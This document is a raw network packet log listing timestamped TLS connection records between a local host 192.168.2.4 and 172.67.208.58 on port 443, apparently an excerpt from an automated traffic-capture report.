                                                                                                                                                                                            Dec 27, 2024 20:23:56.769135952 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.769135952 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.769179106 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.773165941 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.776613951 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.776638985 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.776710987 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.776731014 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.776767015 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.776788950 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.784492970 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.784522057 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.784588099 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.784610987 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.784636974 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.784722090 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.791265965 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.791289091 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.791373014 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.791393042 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.791446924 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.799035072 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.799057961 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.799148083 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.799164057 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.799228907 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.806515932 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.806536913 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.806603909 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.806637049 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.806746960 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.814259052 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.814282894 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.814323902 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.814342976 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.814374924 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.816452026 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.822129965 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.822149038 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.822182894 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.822191954 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.822215080 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.822231054 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.959337950 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.959395885 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.959428072 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.959446907 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.959485054 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.966823101 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.966845989 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.966912985 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.966934919 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.966974020 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.973859072 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.973880053 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.973937035 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.973977089 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.974004984 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.981530905 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.981549978 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.981622934 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.981641054 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.989326954 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.989346981 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.989407063 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.989434958 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.989485025 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.996716976 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.996736050 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:56.996820927 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:56.996886969 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.004523993 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.004544020 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.004594088 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.004627943 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.004647970 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.011382103 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.011400938 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.011449099 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.011482954 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.011504889 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.053417921 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.150958061 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.150990009 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.151144981 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.151195049 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.151273012 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.158660889 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.158684015 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.158849001 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.158866882 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.158962011 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.166443110 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.166460991 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.166543961 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.166563988 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.166620016 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.173352003 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.173367977 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.173475027 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.173507929 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.173563957 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.181190968 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.181205988 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.181282997 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.181302071 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.181355953 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.188540936 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.188555956 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.188632965 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.188648939 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.188705921 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.196402073 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.196419954 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.196499109 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.196516037 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.200861931 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.204180956 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.204195023 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.204267025 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.204282045 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.204335928 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.352586985 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.352606058 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.352823019 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.352847099 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.352932930 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.359296083 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.359318018 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.359411001 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.359436989 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.359494925 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.367124081 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.367139101 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.367232084 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.367250919 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.367305040 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.373939037 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.373955011 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.374042988 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.374059916 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.374111891 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.382277012 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.382297039 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.382370949 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.382406950 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.382586956 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.389184952 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.389202118 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.389252901 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.389292002 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.389319897 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.389483929 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.397080898 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.397095919 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.397176981 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.397191048 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.397237062 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.404810905 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.404824972 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.404884100 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.404895067 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.404936075 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.543672085 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.543693066 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.543793917 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.543804884 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.543848038 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.551451921 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.551470995 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.551553011 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.551562071 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.551608086 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.559406042 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.559420109 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.559506893 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.559516907 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.559562922 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.567106009 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.567120075 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.567187071 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.567204952 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.567223072 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.568481922 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.574429035 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.574445009 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.574525118 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.574537992 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.574585915 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.581474066 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.581489086 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.581562042 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.581573963 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.581618071 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.589581013 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.589595079 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.589668989 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.589684963 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.589754105 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.597037077 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.597052097 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.597129107 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.597142935 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.597188950 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.598175049 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.598239899 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.736511946 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.736530066 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.736603022 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.736618996 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.736655951 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.736670017 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.744271040 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.744287014 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.744349957 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.744360924 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.744416952 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.751971006 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.751986980 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.752052069 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.752063990 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.752103090 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.759888887 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.759903908 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.759979010 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.759998083 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.760013103 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.761003971 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.767241001 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.767255068 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.767335892 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.767349005 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.767393112 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.774148941 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.774164915 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.774244070 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.774254084 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.774301052 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.782128096 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.782144070 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.782222033 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.782232046 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.782278061 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.789787054 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.789804935 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.789874077 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.789886951 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.789928913 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.968579054 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.968595028 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.968646049 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.968661070 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.968692064 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.968702078 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.976463079 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.976481915 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.976532936 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.976546049 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.976562023 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.976603031 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.984323025 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.984339952 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.984419107 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.984440088 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.984509945 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.991808891 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.991825104 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.991910934 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.991935015 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.992006063 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.999324083 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.999341011 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.999420881 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:57.999450922 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:57.999515057 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.010590076 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.010606050 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.010656118 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.010668039 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.010694981 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.010708094 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.014889002 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.014908075 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.014950037 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.014961958 CET44349747172.67.208.58192.168.2.4
                                                                                                                                                                                            Dec 27, 2024 20:23:58.015002012 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.015014887 CET49747443192.168.2.4172.67.208.58
                                                                                                                                                                                            Dec 27, 2024 20:23:58.022110939 CET44349747172.67.208.58192.168.2.4
